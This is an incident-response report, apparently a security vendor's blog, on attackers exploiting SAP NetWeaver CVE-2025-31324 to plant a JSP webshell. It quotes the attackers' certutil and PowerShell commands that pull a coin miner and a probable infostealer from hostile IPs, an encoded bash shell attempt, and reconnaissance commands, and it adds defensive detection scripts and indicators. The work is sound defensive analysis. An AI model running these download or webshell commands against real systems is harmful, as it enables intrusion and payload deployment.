SAP NetWeaver CVE-2025-31324 Exploitation
by Rob Anderson
30 April 2025
On 29 April 2025, a vulnerability in SAP NetWeaver, CVE-2025-31324, was added to CISA's Known Exploited Vulnerabilities (KEV) catalogue. The vulnerability was reported as being exploited on 22/04/2025 by ReliaQuest, who observed unauthorised file uploads and malicious code execution on SAP NetWeaver systems. WithSecure was aware of exploitation campaigns targeting SAP and had already begun actively hunting across customer estates. SAP released a patch for the vulnerability on 26/04/2025, but stated that they did not have any evidence that it had been exploited as a zero-day.
CVE-2025-31324 is a critical zero-day vulnerability in SAP NetWeaver's Visual Composer component, specifically impacting version 7.50. NetWeaver is a platform that serves as the foundation for SAP's enterprise applications such as SAP ERP, SAP CRM and SAP BW. Multiple other security researchers soon afterwards reported what they believed to be exploitation of CVE-2025-31324.
Proof of concept (POC) exploit code for this vulnerability has since been publicly released and, as of the release date of this blog, is being actively discussed on deep and dark web criminal forums, with actors seeking to monetise footholds in organisations obtained through exploitation of CVE-2025-31324.
WithSecure detected an attack that first began with the exploitation of CVE-2025-31324 in March 2025, suggesting that this vulnerability has been known to criminals and exploited for some time.
Threat Hunting: Uncovering Certutil Misuse via Webshell for XMRig Coin Miner Deployment
During a recent threat hunting operation, WithSecure IR identified a sophisticated attack leveraging a webshell to misuse the Windows utility certutil to deploy the XMRig coin miner. This was rapidly followed by other reconnaissance activities, probably indicating that multiple threat actors had compromised the device. This incident underscores the critical need for vigilant monitoring of unusual system activities and the abuse of legitimate tools.
Incident Overview
On 29/04/2025, WithSecure IR detected malicious activity involving the execution of the following command via a webshell on an Internet-facing SAP NetWeaver server:
cmd /c certutil -urlcache -split -f hxxp://23.95.123[.]5:666/xmrigCCall/1110.exe C:\Users\Public\1110.exe
This command, executed through a webshell file named helper.jsp, leveraged certutil, a legitimate Windows tool for managing certificates, to download and attempt to execute a malicious payload. CertUtil has been known to be abused by threat actors as a Living Off the Land tool in this way for some time. The payload was identified as XMRig, a well-known coin miner notorious for exploiting system resources in cryptojacking attacks. The payload was retrieved from a suspicious IP address (23.95.123[.]5:666) and saved to C:\Users\Public\1110.exe. A similar command was observed 3 days earlier on 26/04/2025, retrieving and deploying another payload (s.exe) from the same location, indicating multiple attempts to deploy the miner, all of which were blocked by WithSecure Elements.
Initial exploitation
SAP NetWeaver CVE-2025-31324 enables unauthenticated attackers to upload malicious files to NetWeaver servers. The issue stems from insufficient file validation in the /developmentserver/metadatauploader endpoint. By sending crafted POST requests, attackers can upload malicious JavaServer Pages (JSP) webshells into the j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/ directory. These webshells can then be triggered via GET requests, enabling remote command execution and giving attackers remote access to and control over the host. The activity observed in this compromise matches the expected post-compromise behaviour from exploitation of CVE-2025-31324, so it is highly likely that this CVE was the initial method of compromise.
Evidence suggests the first compromise of CVE-2025-31324 in this incident occurred on 18/03/2025, when a threat actor deployed the helper.jsp webshell file.
Webshell Details
- Location: D:\usr\sap\POP\J00\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root\helper.jsp
- Size: 906 bytes
- Created: 18/03/2025 08:16:03
- SHA1 Hash: 925f6bc2a3fb5bb15a434f5f42196d49f36459e3
The webshell deployment was corroborated by a log entry in the SAP NetWeaver system (local time):
responses_00.3.trc:[18/03/2025 09:16:03] - 10.0.x.x : POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1 200 43 [109]
This log indicates a successful POST request, likely used to upload the webshell, enabling persistent access to the compromised system.
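As an added example (not WithSecure's code), the following script hunts for JSP files under the portal root described above that are not part of a known-good baseline, and checks every file against the SHA1 indicators listed in this post. The baseline mechanism, the directory layout and the two sample files are constructed assumptions; the placeholder "helper.jsp" it creates is harmless text standing in for an unexpected upload.

```python
"""
Added example (not WithSecure's code): hunting for JSP files under the
NetWeaver portal root that are not part of a known-good baseline, and
checking each against the SHA1 indicators listed in the post. The baseline
mechanism, directory layout and sample files are constructed assumptions.
"""
import hashlib
import os
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# SHA1 indicators from the post.
IOC_SHA1 = {
    "925f6bc2a3fb5bb15a434f5f42196d49f36459e3",  # helper.jsp webshell
    "272b2fc48f6cbbf105cbe961b163de99e761b31d",  # downloaded executable
}


def sha1_of(path):
    """Stream a file through SHA1 so large files need not fit in memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hunt_jsp(root, baseline_sha1):
    """Return (relative path, sha1, mtime, verdict) for every JSP under root
    that is either a known IOC or absent from the baseline of expected hashes."""
    findings = []
    for p in sorted(Path(root).rglob("*.jsp")):
        digest = sha1_of(p)
        if digest in IOC_SHA1:
            verdict = "known-webshell"
        elif digest in baseline_sha1:
            continue  # expected content from the reference install
        else:
            verdict = "unknown-jsp"
        mtime = datetime.fromtimestamp(p.stat().st_mtime, tz=timezone.utc).isoformat()
        findings.append((str(p.relative_to(root)), digest, mtime, verdict))
    return findings


def build_sample_tree():
    """Constructed portal root: one legitimate page and one unexpected JSP.
    The unexpected file is a harmless placeholder, not a real webshell."""
    root = tempfile.mkdtemp(prefix="irj_root_")
    Path(root, "index.jsp").write_text("<%-- constructed: legitimate portal page --%>\n")
    Path(root, "helper.jsp").write_text("<%-- constructed: placeholder for an unexpected upload --%>\n")
    return root


def sample_baseline(root):
    """In practice the baseline comes from a clean install at the same SP level;
    here it is built from the constructed legitimate page only."""
    return {sha1_of(os.path.join(root, "index.jsp"))}


if __name__ == "__main__":
    root = build_sample_tree()
    for finding in hunt_jsp(root, sample_baseline(root)):
        print(finding)
```

Run it against the real servlet_jsp/irj/root directory (with a baseline taken from a clean system at the same support package level) and any JSP that is neither baselined nor a known indicator is worth opening; the modification time gives a first anchor for correlating with the metadatauploader POSTs in the HTTP trace.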
Webshell Activity and XMRig Deployment
The webshell was used to execute multiple malicious commands. On 26/04/2025, the following command was executed:
cmd /c certutil -urlcache -split -f hxxp://23.95.123[.]5:666/xmrigCCall/s.exe C:\Users\Public\s.exe
The parent process of this command was SAP's jstart.EXE process:
D:\usr\sap\POP\J00\exe\jstart.EXE -appTrc -nodeId=2 pf=\\SYSTEM01\sapmnt\POP\SYS\profile\POP_J00_SYSTEM01 -DSAPINFO=POP_00_server0 -hostvm -nodeName=ID555550 -file=D:\usr\sap\POP\J00\j2ee\cluster\instance.properties -jvmFile=D:\usr\sap\POP\J00\work\jstart.jvm -traceFile=D:\usr\sap\POP\J00\work\dev_server0 -javaOutFile=D:\usr\sap\POP\J00\work\
On 29/04/2025, a similar command was executed, as evidenced by the following log entry:
[29/04/2025 01:20:53] - 10.0.x.x : GET /irj/helper.jsp?cmd=cmd%20/c%20certutil%20-urlcache%20-split%20-f%20hxxp://23.95.123[.]5:666/xmrigCCall/1110.exe%20C:%5CUsers%5CPublic%5C1110.exe HTTP/1.1 200 360 [47]
This log confirms that the webshell facilitated the download of the XMRig payload (1110.exe) to C:\Users\Public\1110.exe, with a successful HTTP response (200). The use of the same malicious infrastructure (23.95.123[.]5:666) across both commands suggests these activities were part of the same campaign.
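As an added example (not WithSecure's code), the same activity can be caught from process-creation telemetry such as Sysmon Event ID 1 or an EDR process event, by combining the parent/child relationship shown above (jstart.EXE spawning a shell) with certutil's download arguments. The field names, the benign control event and the sample events are constructed, modelled on the command lines quoted in this post with the URLs refanged.

```python
"""
Added example (not WithSecure's code): scoring process-creation events for the
certutil/PowerShell download pattern described in the post. Field names follow
a generic image / parent_image / command_line shape, and the sample events are
constructed from the command lines quoted in the post (URLs refanged).
"""
import re
from pathlib import PureWindowsPath

# Hostile hosts named in the post, refanged so they match real telemetry.
IOC_HOSTS = {"23.95.123.5", "65.49.235.210"}

# The SAP Java server process seen as the parent of the webshell commands;
# it has no business spawning interactive shells.
SAP_JAVA_IMAGES = {"jstart.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

URL_RE = re.compile(r"\b(?:https?|hxxps?)://([^\s/:\"']+)", re.I)
CERTUTIL_DL_RE = re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*\s-f\b", re.I)
WORLD_WRITABLE_DIRS = ("c:\\users\\public", "c:\\windows\\temp", "c:\\programdata")


def image_name(path):
    """Lower-cased file name of a Windows image path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def analyse_event(event):
    """Return the list of reasons an event looks like webshell-driven download activity."""
    reasons = []
    image = image_name(event["image"])
    parent = image_name(event["parent_image"])
    cmdline = event["command_line"]

    if parent in SAP_JAVA_IMAGES and image in SHELLS:
        reasons.append(f"SAP Java server ({parent}) spawned shell {image}")
    if CERTUTIL_DL_RE.search(cmdline):
        reasons.append("certutil used as a downloader (-urlcache ... -f)")
    for host in URL_RE.findall(cmdline):
        if host.lower() in IOC_HOSTS:
            reasons.append(f"command line references known IOC host {host}")
    if any(d in cmdline.lower() for d in WORLD_WRITABLE_DIRS):
        reasons.append("payload written to a world-writable directory")
    return reasons


def scan_events(events):
    """Pair each suspicious event with its reasons; benign events are dropped."""
    hits = []
    for e in events:
        reasons = analyse_event(e)
        if reasons:
            hits.append((e, reasons))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # shape of the 26/04 command in the post
        "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"D:\usr\sap\POP\J00\exe\jstart.EXE",
        "command_line": r"cmd /c certutil -urlcache -split -f http://23.95.123.5:666/xmrigCCall/s.exe C:\Users\Public\s.exe",
    },
    {   # benign administrative certutil use; should not fire
        "image": r"C:\Windows\System32\certutil.exe",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "command_line": r"certutil -hashfile C:\temp\patch.msi SHA256",
    },
    {   # shape of the 29/04 PowerShell download in the post
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"D:\usr\sap\POP\J00\exe\jstart.EXE",
        "command_line": r'powershell Invoke-WebRequest -Uri "http://65.49.235.210/download/2.jpg" -OutFile "cmake.exe"',
    },
]

if __name__ == "__main__":
    for event, reasons in scan_events(SAMPLE_EVENTS):
        print(image_name(event["image"]), "<-", image_name(event["parent_image"]))
        for r in reasons:
            print("   ", r)
```

The parent-process rule is the one that survives infrastructure changes: the IOC host list will go stale, but a NetWeaver Java node spawning cmd.exe or powershell.exe is abnormal regardless of what the child then downloads.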
Additional activity was observed on 28/04/2025, when the webshell was used to attempt a base64-encoded bash command, likely part of an automated exploitation attempt:
[28/04/2025 05:26:16] - 10.0.x.x : GET /irj/helper.jsp?cmd=bash%20-c%20%7Becho%2C....%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D HTTP/1.1 500 841 [15]
This failed attempt to execute Linux commands (bash) on a Windows system indicates the attacker employed blind, OS-agnostic exploitation scripts, a common tactic in XMRig campaigns targeting vulnerable systems.
On 29/04/2025, further commands were executed via the webshell, indicating reconnaissance and an attempt to download a probable infostealer executable:
- whoami
- net group "domain computers" /domain
- net user /domain
- powershell Invoke-WebRequest -Uri "hxxp://65.49.235[.]210/download/2.jpg" -OutFile "cmake.exe"
Executable Details
- SHA1 Hash: 272b2fc48f6cbbf105cbe961b163de99e761b31d
- IMPHASH: c26e06ea6e5c59be8d491b77792f43e6
- Contacted URL: hxxps://65.49.235[.]210/_api/web/
These commands were used to gather information about the environment, map the network, and identify privileged accounts for potential lateral movement, which is contrary to previous XMRig campaigns.
Considering the Bash/Linux commands issued via the webshell on 28/04/2025 and the Windows reconnaissance commands on 29/04/2025, it seems likely that at least 2 additional actors were taking advantage of the presence of the webshell, hijacking its original use. The actor who originally exploited the server knew it was a Windows server and would not have run Bash commands against it. They also seemingly rapidly achieved their goal of deploying a cryptominer, which did not need further lateral movement or reconnaissance after its deployment. This is interesting because these later actors were not scanning for and exploiting the vulnerability for access to the server; they were specifically scanning for and using the webshell that had been deployed as part of another actor's campaign.
Response and Mitigation
Upon discovery, WithSecure promptly contacted the client, who took immediate action to contain the incident:
- System Isolation: The compromised system was isolated to prevent further malicious activity.
- Patching: The client applied patches to address CVE-2025-31324 in SAP NetWeaver, closing the initial attack vector.
- Eradication: The webshell (helper.jsp) was removed and the XMRig payloads were automatically blocked by WithSecure’s DeepGuard protection.
Lessons Learned
This incident highlights several critical takeaways for incident response and threat hunting teams:
- Monitor Host Activity: Webshells like helper.jsp provide persistent access and enable the execution of malicious commands, such as certutil misuse. Monitoring for unauthorised JSP files or unusual HTTP requests (e.g., POST to /developmentserver/metadatauploader or GET requests with encoded commands) is critical.
- Detect Legitimate Tool Misuse: Tools like certutil are often abused to evade detection. Monitoring for unusual command-line arguments, such as -urlcache with external URLs, is essential.
- Patch Management: Timely patching of vulnerabilities, such as CVE-2025-31324, can prevent initial access and subsequent exploitation.
- Log Analysis: Detailed logging, as seen in the SAP NetWeaver logs, is invaluable for reconstructing attack timelines and identifying webshell activity.
- Proactive Threat Hunting: Regular threat hunting can uncover early signs of compromise, such as webshells, before they are used to deploy malicious payloads like XMRig.
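As an added example (not WithSecure's code), the following script applies the log-monitoring advice above to SAP NetWeaver HTTP trace lines: it flags POSTs to /developmentserver/metadatauploader, GETs to JSP files under /irj/ that carry a cmd= parameter, and, after decoding that parameter, the certutil -urlcache download, base64-to-bash and domain reconnaissance patterns seen in this incident. The log line format is inferred from the lines quoted in this post; the sample lines are constructed (client IP and base64 payload are placeholders, URLs refanged).

```python
"""
Added example (not WithSecure's code): scanning SAP NetWeaver HTTP trace log
lines for the indicators described in the post. The log format is inferred
from the quoted lines; the sample lines below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Line shape seen in the post: optional "file:" prefix, then
# [dd/mm/yyyy HH:MM:SS] - <client ip> : <METHOD> <path?query> HTTP/1.1 <status> <bytes> [<ms>]
LOG_RE = re.compile(
    r"^(?:(?P<file>\S+):)?\[(?P<ts>\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\]"
    r" - (?P<ip>\S+) : (?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"
    r" (?P<status>\d{3}) (?P<size>\d+) \[(?P<ms>\d+)\]$"
)

UPLOAD_ENDPOINT = "/developmentserver/metadatauploader"
JSP_ROOT = "/irj/"  # where uploaded JSPs become reachable, per the post

# Rules applied to the decoded value of the cmd= parameter.
COMMAND_RULES = [
    ("certutil-download", re.compile(r"certutil.*-urlcache.*\b(?:https?|hxxps?)://", re.I)),
    ("base64-bash", re.compile(r"\bbash\b.*base64", re.I)),
    ("powershell-download", re.compile(r"powershell.*(?:Invoke-WebRequest|iwr|DownloadFile)", re.I)),
    ("ad-recon", re.compile(r"^\s*(?:whoami|net\s+(?:user|group)\b)", re.I)),
]


def parse_line(line):
    """Return a dict of fields for one trace line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    parts = urlsplit(d["target"])
    d["path"] = parts.path
    d["query"] = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    return d


def classify(entry):
    """Return a list of (rule, detail) findings for one parsed entry."""
    findings = []
    if entry["method"] == "POST" and entry["path"] == UPLOAD_ENDPOINT:
        rule = "upload-success" if entry["status"] == 200 else "upload-attempt"
        findings.append((rule, entry["target"]))
    if entry["path"].startswith(JSP_ROOT) and entry["path"].endswith(".jsp") and "cmd" in entry["query"]:
        cmd = entry["query"]["cmd"][0]
        findings.append(("webshell-command", cmd))
        for name, rx in COMMAND_RULES:
            if rx.search(cmd):
                findings.append((name, cmd))
    return findings


def scan(lines):
    """Scan an iterable of log lines; return a list of (timestamp, ip, rule, detail)."""
    hits = []
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        for rule, detail in classify(e):
            hits.append((e["ts"], e["ip"], rule, detail))
    return hits


# Constructed sample, modelled on the lines quoted in the post.
SAMPLE_LOG = [
    "responses_00.3.trc:[18/03/2025 09:16:03] - 10.0.0.12 : POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1 200 43 [109]",
    "[18/03/2025 09:17:10] - 10.0.0.12 : GET /irj/portal HTTP/1.1 200 1532 [22]",  # benign portal traffic
    "[28/04/2025 05:26:16] - 10.0.0.12 : GET /irj/helper.jsp?cmd=bash%20-c%20%7Becho%2CZWNobyBoaQ%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D HTTP/1.1 500 841 [15]",
    "[29/04/2025 01:20:53] - 10.0.0.12 : GET /irj/helper.jsp?cmd=cmd%20/c%20certutil%20-urlcache%20-split%20-f%20http://23.95.123.5:666/xmrigCCall/1110.exe%20C:%5CUsers%5CPublic%5C1110.exe HTTP/1.1 200 360 [47]",
    "[29/04/2025 01:25:07] - 10.0.0.12 : GET /irj/helper.jsp?cmd=net%20user%20/domain HTTP/1.1 200 210 [31]",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Feed it the responses_*.trc files from each Java server node; a metadatauploader POST followed by GETs to a JSP file that did not ship with the portal is the sequence this incident shows, and even a 500 response (as in the failed bash attempt) still tells you the webshell is present and being used.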
Conclusion
The use of an exploit to deploy a webshell, which in turn leveraged the local, legitimate binary certutil in order to deploy XMRig, demonstrates the sophistication of modern cyber threats. The attacker's exploitation of CVE-2025-31324 to deploy the webshell enabled persistent access, facilitating multiple attempts to install coin miners. This webshell was then taken advantage of even further by other actors in further compromise attempts. Fortunately, by combining proactive threat hunting, robust patch management, and rapid incident response, organisations can mitigate the risks posed by such attacks. This incident serves as a reminder to remain vigilant and adapt to the ever-changing threat landscape.
It is almost certain that, due to the celebrity of this vulnerability and the availability of exploit code, a broad spectrum of threat actors will seek to exploit it, with activity not limited to resource-jacking / cryptocurrency mining.
For further inquiries or assistance with threat hunting and incident response, contact our team at WithSecure.
IOC
- 272b2fc48f6cbbf105cbe961b163de99e761b31d
- 925f6bc2a3fb5bb15a434f5f42196d49f36459e3
- 65.49.235[.]210
- 23.95.123[.]5